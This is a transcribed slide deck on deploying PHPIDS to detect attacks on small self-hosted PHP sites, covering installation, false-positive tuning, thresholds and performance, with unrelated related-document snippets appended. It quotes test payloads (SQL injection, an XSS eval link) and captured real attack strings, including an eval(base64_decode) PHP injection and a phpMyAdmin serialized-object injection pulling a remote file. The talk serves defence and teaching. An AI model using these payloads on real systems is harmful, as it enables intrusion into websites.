Using PHPIDS to Understand Attacks
|
|
|
- Job Lawson
- 10 years ago
- Views:
Transcription
1 Using PHPIDS to Understand Attacks
2
3
4
5
6
7
8
9
10
11
12 Infosec Career Start - WebAppSec Around 2002 Sooo Much Simpler No CSRF, Click-Jacking, SQLi No SOAP No AJAX No HTML5 Had Our Problems Browser Wars Still Going On Per Browser Customizations No Guidance Limited Security Libraries Immature Tools
13
14
15
16
17
18 Pic of hacked sites; news articles of breaches, mid-2000s
19
20 Infosec COTS
21
22
23 Agenda Introduction Why Use PHPIDS? What Is PHPIDS? Installation Maintenance & Operations Performance Issues Bypassing Detection Trends Use Within Other Tools Conclusion
24 Introduction Understand What People Could Be Hitting Site With Not Many Security Log Parsing Scripts Just Look Through & Look for Things Only GET-Based Attacks Recorded Possible Tools for Monitoring Simple Log Watcher (SWATCH) PHPIDS PHPIDS Open Source Awesome Software Little Documentation for Lay Tech Person Like Myself Took Few Hours to Figure Out Ins & Outs (many more later to tweak, maintain, & really understand it) Wanted to Document for Others to Use
25 Why Use PHPIDS? Mom & Pop Self-Hosted Blog $10/mo Shared Hosting Plan Limited Web Server Access/Control Nothing at Network Level NIDS (e.g., Snort) Nothing at OS Level Nothing at Web Server Level WAF (e.g., modsecurity) Limited at PHP Level No Configs Control (php.ini) Full Control of PHP Written Code Forget Big Vendor $50K Software or Hardware Appliance
26 What Is PHPIDS? Definition Architecture Operational Flow Detection Mechanisms
27 What Is PHPIDS? Definition PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application. The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to. Based on a set of approved and heavily tested filter rules any attack is given a numerical impact rating which makes it easy to decide what kind of action should follow the hacking attempt. This could range from simple logging to sending out an emergency mail to the development team, displaying a warning message for the attacker or even ending the user s session. PHPIDS enables you to see who s attacking your site and how and all without the tedious trawling of logfiles or searching hacker forums for your domain. Last but not least it s licensed under the LGPL!
28 What Is PHPIDS? - Architecture
29 What Is PHPIDS? Operational Flow Database
30 What Is PHPIDS? Detection Mechanisms Anti-Evasion Normalizations Converter.php Signatures default_filter.xml Centrifuge Incoming Strings > 25 Characters Ratio = Count of Word Characters, Spaces, Punctuation / Non-Word Characters Lower the Ratio ~ Greater Probability of Attack Normal = 7.5; Attack Trigger < 3.5
31 Installation Install Code Create Reference File Include Reference File Verify Working Prepare for Production
32 Installation Install Code Web Host No Access to Recommended /var/lib Directory Create applications Folder Off User s Home Directory Could Put in WWW Directory If Don t Use DB Logging Most Recommend Keeping Out of Web Root Upload & Unzip into Directory Outside of Web Root./applications/phpids-0.7 Keep Version Numbers for Easy Upgrades/Reverts
33 Installation Create Reference File Create phpids.php File in Website s Root Base on phpids- 0.7/docs/examples/examp le.php Change Path References to PHPIDS Installation Just Three Lines Verify Permissions to 644
34 First Change // set the include path properly for PHPIDS. /home/[user]/applications/phpids-x.x/lib Second Change /* * It s pretty easy to get the PHPIDS running * 1. Define what to scan $init = IDS_Init::init( /home/[user]/applications/phpidsx.x/lib/ids/config/config.ini.php ); Third Change /** * You can also reset the whole configuration * array or merge in own data $init->config['general']['base_path'] = /home/[user]/applications/phpids-x.x/lib/ids/ ;
35 Installation Include Reference File Include phpids.php in Template Files After Header Call header.php <?php include phpids.php ;?>
36 Installation Other Tweaks Detections recipients[] = [ here] Exceptions
37 Installation Verify Working
38 Installation Verify Working
39 Installation Verify Working Legend CSRF: Cross-Site Request Forgery DT: Dir Traversal ID: Info Disclosre LFI: Loc File Inclu RFE: Remote File Exe SQLI: SQL Inject XSS: Cross-Site Script
40 Installation Verify Working Verify Logged a.b.c.d", T19:20:03+00:00,26,"sqli id lfi","request.test%3d%255c%2522aaa%25 5C%2522%2520or%25201%253D1%253B+G ET.test%3D%255C%2522aaa%255C%2522%2 520or%25201%253D1%253B","%2F%3Ftest% 3D%2522aaa%2522%2520or%25201%3D1%3 B", e.f.h.i REQUEST=\"aaa\" or 1=1;
41 Installation Verify Working Additional Examples To Try?test= %20OR%201=1--?test= >XXX
42 Installation Prepare for Production Cleanup phpids.php Comment Out Initial Echo Commands that Show It Detected an Attack Optional Remove All Folders in PHPIDS Directory Except for./phpids- 0.7/lib/IDS Final Test Previous Slides
43 Installation Prepare for Production /* echo $result; */ /* require_once IDS/Log/Database.php ; */ /* IDS_Log_Database::getInstance($init) */ } /* else { echo <a href=?test=%22><script>eval(window.name)</script> >No attack detected click for an example attack</a> ; } */
44 Maintenance & Operations Calibrating Installation Updating Signatures Keeping Attackers Away Adding Thresholds
45 Maintenance & Ops Calibrating Installation Lots of Google Analytics Cookie False Positives x.x.x.x,yyyy-mm-ddt19:31:03-05:00,12, xss csrf id rfe lfi, COOKIE. utmz= utmcsr %3Dgoogle%7Cutmccn%3D%28organic%29%7Cutmcmd %3Dorganic%7Cutmctr%3DNOVA%20cyber%20defense, %2F2009%2F10%2F16%2Fin-focus-advertise-withus%2F, xx.x.xxx.xxx Add Exceptions to Config Comes with Two Related Amazon Exceptions ~ GET Add New Under Two Default Exceptions exceptions[] = COOKIE. utmz
46 Maintenance & Operations Calibrating Installation Lived with For Awhile But Still Lots of False Positives Get Feel for What Install Pickings Up Slowly Tweak Exceptions to Meet Needs ColdFusion Cookies Plaguing Me? exceptions[] = COOKIE.CFGLOBALS Others Google Analytics? GET, POST, REQUEST, & COOKIE Methods.utmz and.utmc Exception for All COOKIE Methods? Recommend Using Minimum Necessary
47 Maintenance & Ops Updating Signatures Signature Based Keep Up to Date Download from PHPIDS.org & Overwrite default_filter.xml Converter.php Every 2 or 3 Months Upgrading PHPIDS Software Install in Peer Folder phpids-0.8 Point phpids.php Paths to New Version
48 Maintenance & Ops Keeping Attackers Away Simple Impact Threshold Blocking phpids.php if (!$result->isempty()) {} if (!$result->isempty()) {die( <h1>go away!</h1> );} Risk Turning FPs Away Set Threshold for die Statement if ($result->getimpact() >= 50) { die( <h1>go away!</h1> ); }
49 Maintenance & Operations Adding Thresholds Only Alert by If Impact above Certain Level Suggested Logging to File >= 10 Logging to DB >= 25 Report by >=50 Stop Loading Page >= 100 (die($msg)) CakePHP Example Provides Relatively Complex Code for Thresholding for IDS Reactions
50 Maintenance & Ops Adding Thresholds phpids.php From: if (!$result- >isempty()) {} Replaced Below to Be Conditional $compositelog- >addlogger(ids_log_ : getinstance($init).. <stuff I commented out>..); if ($result->getimpact() >= 25) { <the above compositelog code> }
51 Performance Issues Lots of Contention Some Say No Effect Others Say Big Effect IronGeek Used but Removed
52 Performance Issues Developer Profiled CakePHP 1.1 in 3/2008 Xdebug Profiler Output in KCachegrind 0.54%
53 Performance Issues Pingdom.com Website Uptime & Performance Monitoring Response Time 10 Sites Globally 1145 ms
54 Performance Issues Pingdom.com 4 Sites US 845 ms
55 Interesting Detections IP: a.b.c.d Date: Impact: 92 Affected tags: xss csrf id rfe sqli lfi Affected parameters: REQUEST.char_repl=%5C%27%7B%24%7Bdie%28eval%28base64_d ecode%28%24_post%5bjungliez%5d%29%29%29%7d%7d%5c% 27%3D%3E, POST.char_repl=%5C%27%7B%24%7Bdie%28eval%28base64_deco de%28%24_post%5bjungliez%5d%29%29%29%7d%7d%5c%27 %3D%3E, Request URI: /vbseocp.php \'{${die(eval(base64_decode($_post[jungliez])))}}\'=>, POST.char_repl=\'{${die(eval(base64_decode($_POST[JUNGLIEZ])))} }\'=>
56 Interesting Detections IP: a.b.c.d Date: Impact: 44 Affected tags: xss csrf id rfe sqli lfi Affected parameters: REQUEST.configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%5C%22PMA_Conf ig%5c%22%3a1%3a%7bs%3a6%3a%5c%22source%5c%22%3bs%3a48%3a%5c% 22ftp%3A%2F%2Fu %3A240790% %2F.a%2Fid.txt%5C %22%3B%7D%7D, POST.configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%5C%22PMA_Config% 5C%22%3A1%3A%7Bs%3A6%3A%5C%22source%5C%22%3Bs%3A48%3A%5C%22ft p%3a%2f%2fu %3a240790% %2f.a%2fid.txt%5c%22 %3B%7D%7D, Request URI: /pma/scripts/setup.php /.a/id.txt\";}}, POST.configuration=a:1:{i:0;O:10:\"PMA_Config\":1:{s:6:\"source\";s:48:\"ftp://u9
57 Interesting Detections IP: a.b.c.d Date: Impact: 26 Affected tags: sqli id lfi xss csrf rfe Affected parameters: REQUEST.author_name=%5Bphp%5Decho%28%5C%27Origins%5C %27.php_uname%28%29.%5C%27scanner%5C%27%29%3Bdie%28 %29%3B%5B%2Fphp%5D, POST.author_name=%5Bphp%5Decho%28%5C%27Origins%5C%27. php_uname%28%29.%5c%27scanner%5c%27%29%3bdie%28%29 %3B%5B%2Fphp%5D, Request URI: / .php [php]echo(\'origins\'.php_uname().\'scanner\');die();[/php], POST.author_name=[php]echo(\'Origins\'.php_uname().\'scanner\') ;die();[/php],
58 Use within Other Tools PHPIDS Not Meant to Be Complete Tool Plumbing that Other Tools Can Include to Perform More Advanced Analysis/Capabilities Shunning IP Addresses for Period of Time. WordPress WPIDS Abandoned? Mute Screamer Others ModSecurity (uses default filter rules) Drupal Module Mediawiki Extension ZIDS (Zend framework) px_phpids (Typo3) Dotnetids (ASP.NET apps)
59 References Intrusion Detection For PHP Applications With PHPIDS Getting Started with the PHPIDS Intrusion Detection System PHPIDS FAQ PHPIDS Install Notes PHPIDS - Monitoring attack surface activity Wikipedia PHPIDS Forum
60 Conclusion Security Layer for PHP Web Application Where Attacks Detected & Given Numerical Impact Rating Fits Mom & Pop Scenario Normal Enterprise this Would Never Do Part of Layered Defense Keep PHP Application Patched/Up to Date PHPIDS Easy Installation & Maintenance Need to Refine Over Time Customize with Exceptions/Alert Thresholds -Detection Trends CMS Plugins that Provide Advanced Functionality to Plumbing
61 Contact Info Twitter Website NovaInfosecPortal.com
62 Questions?
ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION
ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION V 2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: Learn the various attacks like sql injections, cross site scripting, command execution
Columbia University Web Security Standards and Practices. Objective and Scope
Columbia University Web Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Security Standards and Practices document establishes a baseline of security related requirements
SANDCAT THE WEB APPLICATION SECURITY ASSESSMENT SUITE WHAT IS SANDCAT? MAIN COMPONENTS. Web Application Security
SANDCAT WHAT IS SANDCAT? THE WEB APPLICATION SECURITY ASSESSMENT SUITE Sandcat is a hybrid multilanguage web application security assessment suite - a software suite that simulates web-based attacks. Sandcat
The "Easy" Button for Your Web Application Security Career. @grecs
The "Easy" Button for Your Web Application Security Career @grecs Infosec Career Start - WebAppSec Around 2002 Sooo Much Simpler No CSRF, Click-Jacking, SQLi No SOAP No AJAX No HTML5 Had Our
Intrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
Client logo placeholder XXX REPORT. Page 1 of 37
Client logo placeholder XXX REPORT Page 1 of 37 Report Details Title Xxx Penetration Testing Report Version V1.0 Author Tester(s) Approved by Client Classification Confidential Recipient Name Title Company
State of The Art: Automated Black Box Web Application Vulnerability Testing. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell
Stanford Computer Security Lab State of The Art: Automated Black Box Web Application Vulnerability Testing, Elie Bursztein, Divij Gupta, John Mitchell Background Web Application Vulnerability Protection
MS Enterprise Library 5.0 (Logging Application Block)
International Journal of Scientific and Research Publications, Volume 4, Issue 8, August 2014 1 MS Enterprise Library 5.0 (Logging Application Block) Anubhav Tiwari * R&D Dept., Syscom Corporation Ltd.
JOOMLA SECURITY. ireland website design. by Oliver Hummel. ADDRESS Unit 12D, Six Cross Roads Business Park, Waterford City
JOOMLA SECURITY by Oliver Hummel ADDRESS Unit 12D, Six Cross Roads Business Park, Waterford City CONTACT Nicholas Butler 051-393524 089-4278112 [email protected] Contents Introduction 3 Installation
Implementation of Web Application Firewall
Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,
Data Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
ASL IT Security Advanced Web Exploitation Kung Fu V2.0
ASL IT Security Advanced Web Exploitation Kung Fu V2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: There is a lot more in modern day web exploitation than the good old alert( xss ) and union
3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) [email protected] Open Web Application Security Project http://www.owasp.org
Still Aren't Doing. Frank Kim
Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
Webapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
Hardening Moodle. Concept and Realization of a Security Component in Moodle. a project by
Concept and Realization of a Security Component in Moodle a project by Andreas Gigli, Lars-Olof Krause, Björn Ludwig, Kai Neumann, Lars Schmidt and Melanie Schwenk 2 Agenda Plugin Installation in Moodle
Magento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.
CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape
We protect you applications! No, you don t. Digicomp Hacking Day 2013 May 16 th 2013
We protect you applications! No, you don t Digicomp Hacking Day 2013 May 16 th 2013 Sven Vetsch Partner & CTO at Redguard AG www.redguard.ch Specialized in Application Security (Web, Web-Services, Mobile,
How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
WordPress Security Scan Configuration
WordPress Security Scan Configuration To configure the - WordPress Security Scan - plugin in your WordPress driven Blog, login to WordPress as administrator, by simply entering the url_of_your_website/wp-admin
Advanced Web Security, Lab
Advanced Web Security, Lab Web Server Security: Attacking and Defending November 13, 2013 Read this earlier than one day before the lab! Note that you will not have any internet access during the lab,
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
Secure development and the SDLC. Presented By Jerry Hoff @jerryhoff
Secure development and the SDLC Presented By Jerry Hoff @jerryhoff Agenda Part 1: The Big Picture Part 2: Web Attacks Part 3: Secure Development Part 4: Organizational Defense Part 1: The Big Picture Non
ASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus
ASP.NET MVC Secure Coding 4-Day hands on Course Course Syllabus Course description ASP.NET MVC Secure Coding 4-Day hands on Course Secure programming is the best defense against hackers. This multilayered
Web Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications
Thomas Röthlisberger IT Security Analyst [email protected]
Thomas Röthlisberger IT Security Analyst [email protected] Compass Security AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch What
THE BLIND SPOT IN THREAT INTELLIGENCE THE BLIND SPOT IN THREAT INTELLIGENCE
THE BLIND SPOT IN THREAT INTELLIGENCE THE BLIND SPOT IN THREAT INTELLIGENCE How application threat intelligence can make existing enterprise security infrastructures smarter THE BLIND SPOT IN THREAT INTELLIGENCE
Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
Web Application Vulnerability Testing with Nessus
The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP [email protected] Rïk A. Jones Web developer since 1995 (16+ years) Involved with information
Version 1.0.0 USER GUIDE
Magento Extension Grid Manager Version 1.0.0 USER GUIDE Last update: Aug 13 th, 2013 DragonFroot.com Grid Manager v1-0 Content 1. Introduction 2. Installation 3. Configuration 4. Troubleshooting 5. Contact
Columbia University Web Application Security Standards and Practices. Objective and Scope
Columbia University Web Application Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Application Security Standards and Practices document establishes a baseline
THE SMARTEST WAY TO PROTECT WEBSITES AND WEB APPS FROM ATTACKS
THE SMARTEST WAY TO PROTECT WEBSITES AND WEB APPS FROM ATTACKS INCONVENIENT STATISTICS 70% of ALL threats are at the Web application layer. Gartner 73% of organizations have been hacked in the past two
Uploaded images filter evasion for carrying out XSS attacks
February 25, 2007 Uploaded images filter evasion for carrying out XSS attacks Digitаl Security Research Group (DSecRG) Alexander Polyakov [email protected] http://dsecrg.ru Table of contents Introduction...3
Ruby on Rails Secure Coding Recommendations
Introduction Altius IT s list of Ruby on Rails Secure Coding Recommendations is based upon security best practices. This list may not be complete and Altius IT recommends this list be augmented with additional
Web application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
Acunetix Website Audit. 5 November, 2014. Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build 20120808)
Acunetix Website Audit 5 November, 2014 Developer Report Generated by Acunetix WVS Reporter (v8.0 Build 20120808) Scan of http://filesbi.go.id:80/ Scan details Scan information Starttime 05/11/2014 14:44:06
Cyber Security Challenge Australia 2014
Cyber Security Challenge Australia 2014 www.cyberchallenge.com.au CySCA2014 Web Penetration Testing Writeup Background: Pentest the web server that is hosted in the environment at www.fortcerts.cysca Web
5 Mistakes to Avoid on Your Drupal Website
5 Mistakes to Avoid on Your Drupal Website Table of Contents Introduction.... 3 Architecture: Content.... 4 Architecture: Display... 5 Architecture: Site or Functionality.... 6 Security.... 8 Performance...
Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
Web Application Hacking (Penetration Testing) 5-day Hands-On Course
Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
The easy way to a nice looking website design. By a total non-designer (Me!)
The easy way to a nice looking website design By a total non-designer (Me!) Website Refresher Three types of Website 1.Hand rolled HTML. Lightweight static pages. 2.Scripted Website. (PHP, ASP.NET etc.)
(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
Online Vulnerability Scanner Quick Start Guide
Online Vulnerability Scanner Quick Start Guide Information in this document is subject to change without notice. Companies, names, and data used in examples herein are fictitious unless otherwise noted.
2013 MONITORAPP Co., Ltd.
01 Cloud Computing Overview Intelligent Web Application Firewall For Cloud Infrastructure Introduction 2013 MONITORAPP Co., Ltd. 01 Cloud Computing Overview Cloud-based Web Firewall Overview The new form
Web Vulnerability Scanner by Using HTTP Method
Available Online at www.ijcsmc.com International Journal of Computer Science and Mobile Computing A Monthly Journal of Computer Science and Information Technology IJCSMC, Vol. 4, Issue. 9, September 2015,
IBM. Vulnerability scanning and best practices
IBM Vulnerability scanning and best practices ii Vulnerability scanning and best practices Contents Vulnerability scanning strategy and best practices.............. 1 Scan types............... 2 Scan duration
Penetration from application down to OS
April 8, 2009 Penetration from application down to OS Getting OS access using IBM Websphere Application Server vulnerabilities Digitаl Security Research Group (DSecRG) Stanislav Svistunovich [email protected]
W3Perl A free logfile analyzer
W3Perl A free logfile analyzer Features Works on Unix / Windows / Mac View last entries based on Perl scripts Web / FTP / Squid / Email servers Session tracking Others log format can be added easily Detailed
Hardening Joomla 1. HARDENING PHP. 1.1 Installing Suhosin. 1.2 Disable Remote Includes. 1.3 Disable Unneeded Functions & Classes
1. HARDENING PHP Hardening Joomla 1.1 Installing Suhosin Suhosin is a PHP Hardening patch which aims to protect the PHP engine and runtime environment from common exploits, such as buffer overflows in
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework [email protected] keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
HackMiami Web Application Scanner 2013 PwnOff
HackMiami Web Application Scanner 2013 PwnOff An Analysis of Automated Web Application Scanning Suites James Ball, Alexander Heid, Rod Soto http://www.hackmiami.org Overview Web application scanning suites
Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified
Standard: Data Security Standard (DSS) Requirement: 6.6 Date: February 2008 Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified Release date: 2008-04-15 General PCI
How To Test The Bandwidth Meter For Hyperv On Windows V2.4.2.2 (Windows) On A Hyperv Server (Windows V2) On An Uniden V2 (Amd64) Or V2A (Windows 2
BANDWIDTH METER FOR HYPER-V NEW FEATURES OF 2.0 The Bandwidth Meter is an active application now, not just a passive observer. It can send email notifications if some bandwidth threshold reached, run scripts
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.
and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair [email protected] COO, Aspect Security [email protected] Copyright 2007 - The Foundation This work is available
Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure
Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences
Hack Proof Your Webapps
Hack Proof Your Webapps About ERM About the speaker Web Application Security Expert Enterprise Risk Management, Inc. Background Web Development and System Administration Florida International University
EVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS
EVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS SEPTEMBER 2015 MAZIN AHMED [email protected] @MAZEN160 Table of Contents Topic Page Number Abstract 3 Introduction 3 Testing Environment 4 Products
External Network & Web Application Assessment. For The XXX Group LLC October 2012
External Network & Web Application Assessment For The XXX Group LLC October 2012 This report is solely for the use of client personal. No part of it may be circulated, quoted, or reproduced for distribution
Finding Your Way in Testing Jungle. A Learning Approach to Web Security Testing.
Finding Your Way in Testing Jungle A Learning Approach to Web Security Testing. Research Questions Why is it important to improve website security? What techniques are already in place to test security?
Web Application Firewalls Evaluation and Analysis. University of Amsterdam System & Network Engineering MSc
Web Application Firewalls Evaluation and Analysis Andreas Karakannas [email protected] George Thessalonikefs [email protected] University of Amsterdam System & Network Engineering MSc
NSFOCUS Web Application Firewall White Paper
White Paper NSFOCUS Web Application Firewall White Paper By NSFOCUS White Paper - 2014 NSFOCUS NSFOCUS is the trademark of NSFOCUS Information Technology Co., Ltd. NSFOCUS enjoys all copyrights with respect
Content Management System
Content Management System XT-CMS INSTALL GUIDE Requirements The cms runs on PHP so the host/server it is intended to be run on should ideally be linux based with PHP 4.3 or above. A fresh install requires
White Paper BMC Remedy Action Request System Security
White Paper BMC Remedy Action Request System Security June 2008 www.bmc.com Contacting BMC Software You can access the BMC Software website at http://www.bmc.com. From this website, you can obtain information
Standards, Tools and Web 2.0
Standards, Tools and Web 2.0 Web Programming Uta Priss ZELL, Ostfalia University 2013 Web Programming Standards and Tools Slide 1/31 Outline Guidelines and Tests Logfile analysis W3C Standards Tools Web
Drupal CMS for marketing sites
Drupal CMS for marketing sites Intro Sample sites: End to End flow Folder Structure Project setup Content Folder Data Store (Drupal CMS) Importing/Exporting Content Database Migrations Backend Config Unit
How To Prevent Hacker Attacks With Network Behavior Analysis
E-Guide Signature vs. anomaly-based behavior analysis News of successful network attacks has become so commonplace that they are almost no longer news. Hackers have broken into commercial sites to steal
Software Development & Education Center PHP 5
Software Development & Education Center PHP 5 (ADVANCE) Detailed Curriculum Advance PHP JQuery Basics Of JQuery Including the JQuery Library Code in an HTML Page JQuery Utilities Faster, Simpler, More
Adobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
I. Delivery E-mail: Flash CMS template package... 2. II. Flash CMS template installation... 4. III. Control Panel setup... 5
Contents I. Delivery E-mail: Flash CMS template package... 2 II. Flash CMS template installation... 4 III. Control Panel setup... 5 IV. Control Panel activation... 6 Appendix 1: Switching to binary file
MAGENTO Migration Tools
MAGENTO Migration Tools User Guide Copyright 2014 LitExtension.com. All Rights Reserved. Magento Migration Tools: User Guide Page 1 Content 1. Preparation... 3 2. Setup... 5 3. Plugins Setup... 7 4. Migration
The Web AppSec How-to: The Defenders Toolbox
The Web AppSec How-to: The Defenders Toolbox Web application security has made headline news in the past few years. Incidents such as the targeting of specific sites as a channel to distribute malware
How To Protect A Web Application From Attack From A Trusted Environment
Standard: Version: Date: Requirement: Author: PCI Data Security Standard (PCI DSS) 1.2 October 2008 6.6 PCI Security Standards Council Information Supplement: Application Reviews and Web Application Firewalls
Certified PHP/MySQL Web Developer Course
Course Duration : 3 Months (120 Hours) Day 1 Introduction to PHP 1.PHP web architecture 2.PHP wamp server installation 3.First PHP program 4.HTML with php 5.Comments and PHP manual usage Day 2 Variables,
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
Playing with Web Application Firewalls
Playing with Web Application Firewalls DEFCON 16, August 8-10, 2008, Las Vegas, NV, USA Who is Wendel Guglielmetti Henrique? Penetration Test analyst at SecurityLabs - Intruders Tiger Team Security division
HTTPParameter Pollution. ChrysostomosDaniel
HTTPParameter Pollution ChrysostomosDaniel Introduction Nowadays, many components from web applications are commonly run on the user s computer (such as Javascript), and not just on the application s provider
Attack Vector Detail Report Atlassian
Attack Vector Detail Report Atlassian Report As Of Tuesday, March 24, 2015 Prepared By Report Description Notes [email protected] The Attack Vector Details report provides details of vulnerability
Application security testing: Protecting your application and data
E-Book Application security testing: Protecting your application and data Application security testing is critical in ensuring your data and application is safe from security attack. This ebook offers
STOPPING LAYER 7 ATTACKS with F5 ASM. Sven Müller Security Solution Architect
STOPPING LAYER 7 ATTACKS with F5 ASM Sven Müller Security Solution Architect Agenda Who is targeted How do Layer 7 attacks look like How to protect against Layer 7 attacks Building a security policy Layer
Wordpress Security. A guide on how to not get hacked when using wordpress. David Kennedy (ReL1K) http://www.secmaniac.com Twitter: Dave_ReL1K
Wordpress Security A guide on how to not get hacked when using wordpress. David Kennedy (ReL1K) http://www.secmaniac.com Twitter: Dave_ReL1K So about wordpress. The number one website and blogging software
ultimo theme Update Guide Copyright 2012-2013 Infortis All rights reserved
ultimo theme Update Guide Copyright 2012-2013 Infortis All rights reserved 1 1. Update Before you start updating, please refer to 2. Important changes to check if there are any additional instructions
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
Office 365 and SharePoint Local File Share Synchronization
Office 365 and SharePoint Local File Share Synchronization Frank Daske Business Development Manager Layer2 30.03.2015 The Layer2 Cloud Connector can close many gaps and overcome limitations with Office
SuiteCRM for Developers
SuiteCRM for Developers Getting started with developing for SuiteCRM Jim Mackin This book is for sale at http://leanpub.com/suitecrmfordevelopers This version was published on 2015-05-22 This is a Leanpub
Web Security - Hardening estudy
